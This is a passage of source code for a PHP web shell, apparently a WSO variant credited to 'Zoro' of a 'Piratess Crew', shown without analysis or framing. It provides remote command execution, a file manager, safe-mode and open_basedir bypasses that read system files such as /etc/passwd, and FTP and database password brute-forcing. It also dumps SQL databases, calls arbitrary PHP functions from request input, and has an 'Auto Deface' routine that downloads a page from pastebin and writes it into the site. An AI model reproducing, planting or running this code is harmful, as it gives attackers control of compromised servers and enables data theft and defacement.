651 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
652 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
653 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
654 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
655 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
656 );
657 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
658 $files[] = array_merge($tmp, array('type' => 'file'));
659 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
660 $links[] = array_merge($tmp, array('type' => 'link'));
661 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
662 $dirs[] = array_merge($tmp, array('type' => 'dir'));
663 }
664 $GLOBALS['sort'] = $sort;
665 function cmp($a, $b) {
666 if($GLOBALS['sort'][0] != 'size')
667 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
668 else
669 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
670 }
671 usort($files, "cmp");
672 usort($dirs, "cmp");
673 usort($links, "cmp");
674 $files = array_merge($dirs, $links, $files);
675 $l = 0;
676 foreach($files as $f) {
677 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
678 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
679 $l = $l?0:1;
680 }
681 echo '<tr><td colspan=5>
682 <input type=hidden name=a value=\'FilesMan\'>
683 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
684 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
685 <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
686 if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
687 echo '</select> <input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type="submit" value=">>"></td><td colspan="2" align="right" width="1"></td></tr>
688 </form></table><a style="float:right;background:#333;padding:4px;" href="?Zhell">Auto Deface</a><br></div>
689 ';
690 printFooter();
691}
692?>
693<?php
694
695if(isset($_GET["Zhell"])){
696$path = getcwd();
697$file = file_get_contents('http://pastebin.com/raw/rhYViS0b'); // Change this to your deface page link.
698$b = fopen($path.'/zoro.php', 'w'); // Change this to your desired filename of your deface page.
699fwrite($b,$file);
700fclose($b);
701;
702}
703
704?>
705
706<?php
707
708
709function actionStringTools() {
710 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
711 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
712 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
713 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
714
715 if(isset($_POST['ajax'])) {
716 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
717 ob_start();
718 if(function_exists($_POST['p1']))
719 echo $_POST['p1']($_POST['p2']);
720 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
721 echo strlen($temp), "\n", $temp;
722 exit;
723 }
724 printHeader();
725 echo '<h1>String conversions</h1><div class=content>';
726 $stringTools = array(
727 'Base64 encode' => 'base64_encode',
728 'Base64 decode' => 'base64_decode',
729 'Url encode' => 'urlencode',
730 'Url decode' => 'urldecode',
731 'Full urlencode' => 'full_urlencode',
732 'md5 hash' => 'md5',
733 'sha1 hash' => 'sha1',
734 'crypt' => 'crypt',
735 'CRC32' => 'crc32',
736 'ASCII to HEX' => 'ascii2hex',
737 'HEX to ASCII' => 'hex2ascii',
738 'HEX to DEC' => 'hexdec',
739 'HEX to BIN' => 'hex2bin',
740 'DEC to HEX' => 'dechex',
741 'DEC to BIN' => 'decbin',
742 'BIN to HEX' => 'bin2hex',
743 'BIN to DEC' => 'bindec',
744 'String to lower case' => 'strtolower',
745 'String to upper case' => 'strtoupper',
746 'Htmlspecialchars' => 'htmlspecialchars',
747 'String length' => 'strlen',
748 );
749 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
750 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
751 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
752 foreach($stringTools as $k => $v)
753 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
754 echo "</select><input style='margin-left:5px;border:none;background:#333;border-radius:4px;' type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px;margin-bottom:5px;' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea><br><h1>Output</h1></form><textarea class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px;width:100%;height:125px;' >";
755 if(!empty($_POST['p1'])) {
756 if(function_exists($_POST['p1']))
757 echo htmlspecialchars($_POST['p1']($_POST['p2']));
758 }
759 echo"</textarea></div>";
760 printFooter();
761}
762
763function actionFilesTools() {
764 if( isset($_POST['p1']) )
765 $_POST['p1'] = urldecode($_POST['p1']);
766 if(@$_POST['p2']=='download') {
767 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
768 ob_start("ob_gzhandler", 4096);
769 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
770 if (function_exists("mime_content_type")) {
771 $type = @mime_content_type($_POST['p1']);
772 header("Content-Type: ".$type);
773 }
774 $fp = @fopen($_POST['p1'], "r");
775 if($fp) {
776 while(!@feof($fp))
777 echo @fread($fp, 1024);
778 fclose($fp);
779 }
780 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
781
782 }
783 exit;
784 }
785 if( @$_POST['p2'] == 'mkfile' ) {
786 if(!file_exists($_POST['p1'])) {
787 $fp = @fopen($_POST['p1'], 'w');
788 if($fp) {
789 $_POST['p2'] = "edit";
790 fclose($fp);
791 }
792 }
793 }
794 printHeader();
795 echo '<h1>File tools</h1><div class=content>';
796 if( !file_exists(@$_POST['p1']) ) {
797 echo 'File not exists';
798 printFooter();
799 return;
800 }
801 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
802 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
803 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
804 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
805 if( empty($_POST['p2']) )
806 $_POST['p2'] = 'view';
807 if( is_file($_POST['p1']) )
808 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
809 else
810 $m = array('Chmod', 'Rename', 'Touch');
811 foreach($m as $v)
812 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
813 echo '<br><br>';
814 switch($_POST['p2']) {
815 case 'view':
816 echo '<pre class=ml1>';
817 $fp = @fopen($_POST['p1'], 'r');
818 if($fp) {
819 while( !@feof($fp) )
820 echo htmlspecialchars(@fread($fp, 1024));
821 @fclose($fp);
822 }
823 echo '</pre>';
824 break;
825 case 'highlight':
826 if( is_readable($_POST['p1']) ) {
827 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
828 $code = highlight_file($_POST['p1'],true);
829 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
830 }
831 break;
832 case 'chmod':
833 if( !empty($_POST['p3']) ) {
834 $perms = 0;
835 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
836 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
837 if(!@chmod($_POST['p1'], $perms))
838 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
839 else
840 die('<script>g(null,null,null,null,"")</script>');
841 }
842 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form>';
843 break;
844 case 'edit':
845 if( !is_writable($_POST['p1'])) {
846 echo 'File isn\'t writeable';
847 break;
848 }
849 if( !empty($_POST['p3']) ) {
850 @file_put_contents($_POST['p1'],$_POST['p3']);
851 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
852 }
853 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
854 $fp = @fopen($_POST['p1'], 'r');
855 if($fp) {
856 while( !@feof($fp) )
857 echo htmlspecialchars(@fread($fp, 1024));
858 @fclose($fp);
859 }
860 echo '</textarea><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form>';
861 break;
862 case 'hexdump':
863 $c = @file_get_contents($_POST['p1']);
864 $n = 0;
865 $h = array('00000000<br>','','');
866 $len = strlen($c);
867 for ($i=0; $i<$len; ++$i) {
868 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
869 switch ( ord($c[$i]) ) {
870 case 0: $h[2] .= ' '; break;
871 case 9: $h[2] .= ' '; break;
872 case 10: $h[2] .= ' '; break;
873 case 13: $h[2] .= ' '; break;
874 default: $h[2] .= $c[$i]; break;
875 }
876 $n++;
877 if ($n == 32) {
878 $n = 0;
879 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
880 $h[1] .= '<br>';
881 $h[2] .= "\n";
882 }
883 }
884 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
885 break;
886 case 'rename':
887 if( !empty($_POST['p3']) ) {
888 if(!@rename($_POST['p1'], $_POST['p3']))
889 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
890 else
891 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
892 }
893 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form>';
894 break;
895 case 'touch':
896 if( !empty($_POST['p3']) ) {
897 $time = strtotime($_POST['p3']);
898 if($time) {
899 if(@touch($_POST['p1'],$time,$time))
900 die('<script>g(null,null,null,null,"")</script>');
901 else {
902 echo 'Fail!<script>document.mf.p3.value="";</script>';
903 }
904 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
905 }
906 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form>';
907 break;
908 case 'mkfile':
909
910 break;
911 }
912 echo '</div>';
913 printFooter();
914}
915
916function actionSafeMode() {
917 $temp='';
918 ob_start();
919 switch($_POST['p1']) {
920 case 1:
921 $temp=@tempnam($test, 'cx');
922 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
923 echo @file_get_contents($temp);
924 unlink($temp);
925 } else
926 echo 'Sorry... Can\'t open file';
927 break;
928 case 2:
929 $files = glob($_POST['p2'].'*');
930 if( is_array($files) )
931 foreach ($files as $filename)
932 echo $filename."\n";
933 break;
934 case 3:
935 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
936 curl_exec($ch);
937 break;
938 case 4:
939 ini_restore("safe_mode");
940 ini_restore("open_basedir");
941 include($_POST['p2']);
942 break;
943 case 5:
944 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
945 $uid = @posix_getpwuid($_POST['p2']);
946 if ($uid)
947 echo join(':',$uid)."\n";
948 }
949 break;
950 case 6:
951 if(!function_exists('imap_open'))break;
952 $stream = imap_open($_POST['p2'], "", "");
953 if ($stream == FALSE)
954 break;
955 echo imap_body($stream, 1);
956 imap_close($stream);
957 break;
958 }
959 $temp = ob_get_clean();
960 printHeader();
961 echo '<h1>Safe mode bypass</h1><div class=content>';
962 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit style="margin-left:5px;border:none;background:#333;border-radius:4px;" value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input style="margin-left:5px;border:none;background:#333;border-radius:4px;" type=submit value=">>"></form>';
963 if($temp)
964 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
965 echo '</div>';
966 printFooter();
967}
968
969function actionConsole() {
970 if(isset($_POST['ajax'])) {
971 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
972 ob_start();
973 echo "document.cf.cmd.value='';\n";
974 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
975 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
976 if(@chdir($match[1])) {
977 $GLOBALS['cwd'] = @getcwd();
978 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
979 }
980 }
981 echo "document.cf.output.value+='".$temp."';";
982 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
983 $temp = ob_get_clean();
984 echo strlen($temp), "\n", $temp;
985 exit;
986 }
987 printHeader();
988
989echo '<script>
990if(window.Event) window.captureEvents(Event.KEYDOWN);
991var cmds = new Array("");
992var cur = 0;
993function kp(e) {
994 var n = (window.Event) ? e.which : e.keyCode;
995 if(n == 38) {
996 cur--;
997 if(cur>=0)
998 document.cf.cmd.value = cmds[cur];
999 else
1000 cur++;
1001 } else if(n == 40) {
1002 cur++;
1003 if(cur < cmds.length)
1004 document.cf.cmd.value = cmds[cur];
1005 else
1006 cur--;
1007 }
1008}
1009function add(cmd) {
1010 cmds.pop();
1011 cmds.push(cmd);
1012 cmds.push("");
1013 cur = cmds.length-1;
1014}
1015</script>';
1016 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
1017 foreach($GLOBALS['aliases'] as $n => $v) {
1018 if($v == '') {
1019 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1020 continue;
1021 }
1022 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1023 }
1024 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1025 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1026 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
1027 if(!empty($_POST['p1'])) {
1028 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
1029 }
1030 echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;" onkeydown="kp(event);">';
1031 echo '</form></div><script>document.cf.cmd.focus();</script>';
1032 printFooter();
1033}
1034
1035function actionLogout() {
1036 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1037 echo '
1038 <!--Str4what Piratess Crew -->
1039 <!--Recoded by Zoro-->
1040
1041 <script>alert("Logout Successful")</script>
1042 <script>alert("Come again!")</script>
1043Error
1044</font>
1045</center>
1046 </center>
1047 <H1><center>
1048
1049 ';
1050}
1051
1052function actionSelfRemove() {
1053 printHeader();
1054 if($_POST['p1'] == 'yes') {
1055 if(@unlink(SELF_PATH))
1056 die('Shell has been removed');
1057 else
1058 echo 'unlink error!';
1059 }
1060 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1061 printFooter();
1062}
1063
1064function actionBruteforce() {
1065 printHeader();
1066 if( isset($_POST['proto']) ) {
1067 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1068 if( $_POST['proto'] == 'ftp' ) {
1069 function bruteForce($ip,$port,$login,$pass) {
1070 $fp = @ftp_connect($ip, $port?$port:21);
1071 if(!$fp) return false;
1072 $res = @ftp_login($fp, $login, $pass);
1073 @ftp_close($fp);
1074 return $res;
1075 }
1076 } elseif( $_POST['proto'] == 'mysql' ) {
1077 function bruteForce($ip,$port,$login,$pass) {
1078 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1079 @mysql_close($res);
1080 return $res;
1081 }
1082 } elseif( $_POST['proto'] == 'pgsql' ) {
1083 function bruteForce($ip,$port,$login,$pass) {
1084 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1085 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1086 @pg_close($res);
1087 return $res;
1088 }
1089 }
1090 $success = 0;
1091 $attempts = 0;
1092 $server = explode(":", $_POST['server']);
1093 if($_POST['type'] == 1) {
1094 $temp = @file('/etc/passwd');
1095 if( is_array($temp) )
1096 foreach($temp as $line) {
1097 $line = explode(":", $line);
1098 ++$attempts;
1099 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1100 $success++;
1101 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1102 }
1103 if(@$_POST['reverse']) {
1104 $tmp = "";
1105 for($i=strlen($line[0])-1; $i>=0; --$i)
1106 $tmp .= $line[0][$i];
1107 ++$attempts;
1108 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1109 $success++;
1110 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1111 }
1112 }
1113 }
1114 } elseif($_POST['type'] == 2) {
1115 $temp = @file($_POST['dict']);
1116 if( is_array($temp) )
1117 foreach($temp as $line) {
1118 $line = trim($line);
1119 ++$attempts;
1120 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1121 $success++;
1122 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1123 }
1124 }
1125 }
1126 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1127 }
1128 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1129 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1130 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1131 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1132 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1133 .'<span>Server:port</span></td>'
1134 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1135 .'<tr><td><span>Brute type</span></td>'
1136 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1137 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1138 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1139 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1140 .'<td><input type=text name=login value="strawhat"></td></tr>'
1141 .'<tr><td><span>Dictionary</span></td>'
1142 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1143 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1144 echo '</div><br>';
1145 printFooter();
1146}
1147
1148function actionSql() {
1149 class DbClass {
1150 var $type;
1151 var $link;
1152 var $res;
1153 function DbClass($type) {
1154 $this->type = $type;
1155 }
1156 function connect($host, $user, $pass, $dbname){
1157 switch($this->type) {
1158 case 'mysql':
1159 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1160 break;
1161 case 'pgsql':
1162 $host = explode(':', $host);
1163 if(!$host[1]) $host[1]=5432;
1164 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1165 break;
1166 }
1167 return false;
1168 }
1169 function selectdb($db) {
1170 switch($this->type) {
1171 case 'mysql':
1172 if (@mysql_select_db($db))return true;
1173 break;
1174 }
1175 return false;
1176 }
1177 function query($str) {
1178 switch($this->type) {
1179 case 'mysql':
1180 return $this->res = @mysql_query($str);
1181 break;
1182 case 'pgsql':
1183 return $this->res = @pg_query($this->link,$str);
1184 break;
1185 }
1186 return false;
1187 }
1188 function fetch() {
1189 $res = func_num_args()?func_get_arg(0):$this->res;
1190 switch($this->type) {
1191 case 'mysql':
1192 return @mysql_fetch_assoc($res);
1193 break;
1194 case 'pgsql':
1195 return @pg_fetch_assoc($res);
1196 break;
1197 }
1198 return false;
1199 }
1200 function listDbs() {
1201 switch($this->type) {
1202 case 'mysql':
1203 return $this->res = @mysql_list_dbs($this->link);
1204 break;
1205 case 'pgsql':
1206 return $this->res = $this->query("SELECT datname FROM pg_database");
1207 break;
1208 }
1209 return false;
1210 }
1211 function listTables() {
1212 switch($this->type) {
1213 case 'mysql':
1214 return $this->res = $this->query('SHOW TABLES');
1215 break;
1216 case 'pgsql':
1217 return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1218 break;
1219 }
1220 return false;
1221 }
1222 function error() {
1223 switch($this->type) {
1224 case 'mysql':
1225 return @mysql_error($this->link);
1226 break;
1227 case 'pgsql':
1228 return @pg_last_error($this->link);
1229 break;
1230 }
1231 return false;
1232 }
1233 function setCharset($str) {
1234 switch($this->type) {
1235 case 'mysql':
1236 if(function_exists('mysql_set_charset'))
1237 return @mysql_set_charset($str, $this->link);
1238 else
1239 $this->query('SET CHARSET '.$str);
1240 break;
1241 case 'mysql':
1242 return @pg_set_client_encoding($this->link, $str);
1243 break;
1244 }
1245 return false;
1246 }
1247 function dump($table) {
1248 switch($this->type) {
1249 case 'mysql':
1250 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1251 $create = mysql_fetch_array($res);
1252 echo $create[1].";\n\n";
1253 $this->query('SELECT * FROM `'.$table.'`');
1254 while($item = $this->fetch()) {
1255 $columns = array();
1256 foreach($item as $k=>$v) {
1257 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1258 $columns[] = "`".$k."`";
1259 }
1260 echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1261 }
1262 break;
1263 case 'pgsql':
1264 $this->query('SELECT * FROM '.$table);
1265 while($item = $this->fetch()) {
1266 $columns = array();
1267 foreach($item as $k=>$v) {
1268 $item[$k] = "'".addslashes($v)."'";
1269 $columns[] = $k;
1270 }
1271 echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1272 }
1273 break;
1274 }
1275 return false;
1276 }
1277 };
1278 $db = new DbClass(@$_POST['type']);
1279 if(@$_POST['p2']=='download') {
1280 ob_start("ob_gzhandler", 4096);
1281 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1282 $db->selectdb($_POST['sql_base']);
1283 header("Content-Disposition: attachment; filename=dump.sql");
1284 header("Content-Type: text/plain");
1285 foreach($_POST['tbl'] as $v)
1286 $db->dump($v);
1287 exit;
1288 }
1289 printHeader();
1290 echo '<h1>Sql browser</h1><div class=content>
1291 <form name="sf" method="post">
1292 <table cellpadding="2" cellspacing="0">
1293 <tr>
1294 <td>Type</td>
1295 <td>Host</td>
1296 <td>Login</td>
1297 <td>Password</td>
1298 <td>Database</td>
1299 <td></td>
1300 </tr>
1301 <tr>
1302 <input type=hidden name=a value=Sql>
1303 <input type=hidden name=p1 value=\'query\'>
1304 <input type=hidden name=p2>
1305 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
1306 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1307 <td>
1308 <select name=\'type\'>
1309 <option value="mysql" '.(@$_POST['type']=='mysql'?'selected':'').'>MySql</option>
1310 <option value="pgsql" '.(@$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>
1311 </select></td>
1312 <td><input type=text name=sql_host value="'.(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])).'"></td>
1313 <td><input type=text name=sql_login value="'.(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])).'"></td>
1314 <td><input type=text name=sql_pass value="'.(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])).'"></td>
1315 <td>';
1316 $tmp = "<input type=text name=sql_base value=''>";
1317 if(isset($_POST['sql_host'])){
1318 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1319 switch($_POST['charset']) {
1320 case "Windows-1251": $db->setCharset('cp1251'); break;
1321 case "UTF-8": $db->setCharset('utf8'); break;
1322 case "KOI8-R": $db->setCharset('koi8r'); break;
1323 case "KOI8-U": $db->setCharset('koi8u'); break;
1324 case "cp866": $db->setCharset('cp866'); break;
1325 }
1326 $db->listDbs();
1327 echo "<select name=sql_base><option value=''></option>";
1328 while($item = $db->fetch()) {
1329 list($key, $value) = each($item);
1330 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1331 }
1332 echo '</select>';
1333 }
1334 else echo $tmp;
1335 }else
1336 echo $tmp;
1337 echo '</td>
1338 <td><input type=submit value=">>"></td>
1339 </tr>
1340 </table>
1341 <script>
1342 function st(t,l) {
1343 document.sf.p1.value = \'select\';
1344 document.sf.p2.value = t;
1345 if(l!=null)document.sf.p3.value = l;
1346 document.sf.submit();
1347 }
1348 function is() {
1349 for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i)
1350 document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked;
1351 }
1352 </script>';
1353 if(isset($db) && $db->link){
1354 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1355 if(!empty($_POST['sql_base'])){
1356 $db->selectdb($_POST['sql_base']);
1357 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1358 $tbls_res = $db->listTables();
